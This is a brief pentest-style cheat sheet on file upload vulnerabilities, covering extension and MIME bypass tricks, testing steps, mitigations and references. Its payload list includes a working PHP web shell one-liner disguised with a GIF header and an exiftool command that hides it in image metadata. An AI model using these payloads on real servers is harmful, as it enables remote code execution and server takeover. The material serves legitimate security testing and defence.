File Upload Attacks

Overview

File Upload vulnerabilities occur when a web application fails to properly validate uploaded files. Attackers can upload malicious files (web shells, executable scripts) that bypass restrictions to achieve remote code execution or server compromise.

Common bypass techniques include MIME type spoofing, double extensions, null byte injection, and content-type manipulation.

Category: Web — Web application enumeration and exploitation techniques.

Key Commands & Payloads

The following commands and payloads are commonly used when testing for or exploiting File Upload Attacks:

shell.php%00.jpg

shell.php.jpg

shell.pHp

shell.php5

shell.asp;.jpg

Content-Type: image/jpeg (inject as image)

GIF89a; <?php system($_GET['cmd']); ?>

exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg

Tools & Techniques

Recommended tools for File Upload Attacks:

• Check Content-Type and Content-Disposition headers
• Test multiple content-type values
• Try extension variations and case mutations
• Test magic byte injection in file content
• Analyze upload directory for path traversal

Prevention & Mitigation

Security recommendations to prevent File Upload Attacks:

• Validate file extensions against an allowlist only
• Verify MIME type server-side (not just client-side)
• Store uploaded files outside the web root
• Use random file names to prevent direct access
• Scan uploaded files with antivirus/malware tools
• Serve uploads from a separate domain without execution rights

References

Additional resources:

• https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload
• https://portswigger.net/web-security/file-upload
• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files